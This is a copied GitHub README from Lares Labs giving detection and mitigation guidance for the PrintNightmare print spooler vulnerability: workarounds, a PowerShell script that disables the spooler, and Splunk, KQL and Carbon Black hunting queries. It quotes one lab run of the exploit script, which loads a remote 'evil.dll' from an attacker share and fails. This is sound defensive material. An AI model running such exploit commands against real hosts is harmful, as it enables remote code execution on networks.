GitHub - LaresLLC/CVE-2021-1675: CVE-2021-1675 Detection Info
source link: https://github.com/LaresLLC/CVE-2021-1675
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
From Lares Labs: Detection & Remediation Information for CVE-2021-1675 & CVE-2021-34527
This repo contains an EVTX sample of the CVE-2021-1675 attack as well as a minimal Sysmon configuration file that can be used to generate the relevant telemetry.
Please note that these rules may be circumvented - please patch as appropriate and disable the printer spooler service on domain controllers.
Please test all recommended fixes before rolling out to production as there may be unintended consequences as a result of these hardening changes. We've written up a blog post explaining the content of this repo and the information found. Here: https://www.lares.com/blog/detection-and-mitigation-advice-for-printnightmare/
Workaround Fix
The patch released by Microsoft does not unfortunately fix the issue, therefore a workaround fix can be applied by disabling the printer spooler service. Here's how to do it on both GPO and PowerShell.
Removal of Authenticated Users from Pre-Windows 2000 Compatible Access
Another fix/workaround is to remove authenticated users from Pre-Windows 2000 Compatible Access as discovered by Dirk-jan.
Ensure the "Authenticated Users" groups are not members of the "Pre-Windows 2000 Compatible Access group". (By default, these groups are not included in current Windows versions.) as shown in the screenshot below there should be no members:
If in doubt as to how to do this, the following steps can be taken:
- Open "Active Directory Users and Computers" (available from various menus or run "dsa.msc").
- Expand the domain being reviewed in the left pane and select the "Builtin" container.
- Double-click on the "Pre-Windows 2000 Compatible Access" group in the right pane.
- Select the "Members" tab.
- If the "Anonymous Logon", "Authenticated Users" or "Everyone" groups are members, select each and click "Remove".
The following GPO can be set to deny client connections to the spooler, which is a potential work around where disabling the spooler service altogether might not be an option. This has been tested against domain controllers and endpoints(W7/W10) in a lab environment and users can still add/remove printers and print however it stops the exploit from working. Note: It is also understood that this GPO also fixes CVE-2021-34527 as noted in Microsoft's vulnerability page.
Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections
set this to Disabled:
Then restart the spooler service on the affected host. All going well the exploit will be denied access:
./CVE-2021-1675.py lares.labs/[email protected] '\\certer.lares.labs\share\evil.dll' 1 ⨯ Password: [*] Try 1... [*] Connecting to ncacn_np:192.168.1.157[\PIPE\spoolss] [-] Connection Failed
PowerShell
Adapted 0gtweet's script to use ADDomainController to pull all DCs from Domain
# the script STOP and DISABLES Print Spooler service (aka #PrintNightmare) on each server from the list below IF ONLY DEFAULT PRINTERS EXIST.
# revert if you need: go to services.msc, find the "print spooler" service, change startup type to "automatic" and start the service.
# Source: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1
#
# Requirements RSAT
# Get-Module -Name ActiveDirectory
# Import-Module -Name ActiveDirectory
$computers = Get-ADDomainController -filter * | %{ $_.name }
foreach ($computer in $computers)
{
Write-Host "Processing $computer ..."
$service = Get-Service -ComputerName $computer -Name Spooler -ErrorAction SilentlyContinue
if (!$service)
{
Write-Host "Cannot connect to Spooler Service on $computer. Skipping." -ForegroundColor Yellow
continue
}
if ($service.Status -ne "Running")
{
Write-Host ("Service status is: """ + $service.Status + """. Skipping.") -ForegroundColor Yellow
continue
}
$printers = (Get-WmiObject -class Win32_printer -ComputerName $computer)
if (!$printers)
{
Write-Host "Cannot enumerate printers. Skipping." -ForegroundColor Yellow
continue
}
$disableSpooler = $true
foreach ($DriverName in ($printers.DriverName))
{
if (($DriverName -notmatch 'Microsoft XPS Document Writer') -and ($DriverName -notmatch 'Microsoft Print To PDF'))
{
Write-Host " Printer found: $DriverName" -ForegroundColor Green
$disableSpooler = $false
}
}
if ($disableSpooler)
{
Write-Host "Only default printers found. Stopping and disabling spooler..." -ForegroundColor DarkCyan
(Get-Service -ComputerName $computer -Name Spooler) | Stop-Service -Verbose
Set-Service -ComputerName $computer -Name Spooler -StartupType Disabled -Verbose
}
else
{
Write-Host "Non-default printers found. Skipping." -ForegroundColor Green
}
}Sysmon Config File
The provided Sysmon configuration CVE-2021-1675.xml file can be installed with Sysmon Config Pusher: https://github.com/LaresLLC/SysmonConfigPusher
Splunk Query
index=sysmon Image="C:\\Windows\\System32\\spoolsv.exe" | stats values(ImageLoaded),values(TargetObject),values(Details),values(TargetFilename)
KQL Query for Sentinel / MDE via Olaf Hartong
let serverlist=DeviceInfo
| where DeviceType != "Workstation"
| distinct DeviceId;
let suspiciousdrivers=DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers"
| distinct SHA1
| invoke FileProfile(SHA1, 1000)
| where GlobalPrevalence < 50 and IsRootSignerMicrosoft != 1 and SignatureState != "SignedValid";
suspiciousdrivers
| join kind=inner (DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers") on SHA1
| where InitiatingProcessFileName != "ccmexec.exe"
Source: https://twitter.com/olafhartong/status/1410229699993874442
Zeek Observations
Tool Used: https://github.com/cisagov/Malcolm
File transfer of DLL:
NTLM Authentication from "Attacking" Machine:
Relevant RPC Calls:
Carbon Black Hunting Query for CVE-2021-1675
Source: https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery/blob/main/README.md
- 1 Based on Sigma rule on detecting the POC code
filemod_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old\\1\\123
- 2 Based on Sigma rule on detecting the POC code
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND parent_cmdline:spoolsv\.exe
- 3 Based on Sigma rule on detecting the POC code
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND process_name:spoolsv\.exe
- 4 Detecting file events (unsigned), adjust this to your baseline. I did not specify driver path on purpose here since the exploitation and post-exploitation is still a bit unclear. Make sure to adjust this to your baseline (known hash, etc).
process_name:spoolsv\.exe AND NOT filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED
- 5 Detecting file events (signed by non MS), adjust this to your baseline
process_name:spoolsv\.exe AND filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED AND NOT filemod_publisher:"Microsoft Windows*"
Alternative approach
A generic way to hunt for Print Spooler exploitation is looking for error generated by print spooler due to loading of the payload DLL. This can be done either through looking for spawning of WerFault.exe by spoolsv.exe or generation of Event ID 7031 showing unexpected termination of print spooler service.
Splunk Query
((index=sysmon EventCode=1
ParentImage="C:\\Windows\\System32\\spoolsv.exe" Image="C:\\Windows\\System32\\WerFault.exe")
OR (index=windows Channel=System EventCode=7031
Message="The Print Spooler service terminated unexpectedly"))
References
Domain Controller Versus Non-Domain Controller Observations via Benjamin Delpy:
Very handy flow chart via Stan Hegt of Outflank
New CVE Assignment from Microsoft:
SANS ICS Diary:
https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/
Recommend
-
45
cve-2021-21985 exploit 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid...
-
34
Files Permalink Latest commit message Commit time
-
17
Files Permalink Latest commit message Commit time
-
11
CVE-2021-1675 Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) Tested on a fully patched...
-
22
CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe4073...
-
11
CVE-2021-41773 Playground This is a small Docker recipe for setting up a Debian bookworm based container with an instance of the Apache HTTPd (2.4.49) that is vulnerable to
-
11
Files Permalink
-
9
Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
-
14
log4j RCE Exploitation Detection You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228 Grep / Zgrep This command searches for exploitation attempts in...
-
12
1675. Minimize Deviation in Array
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK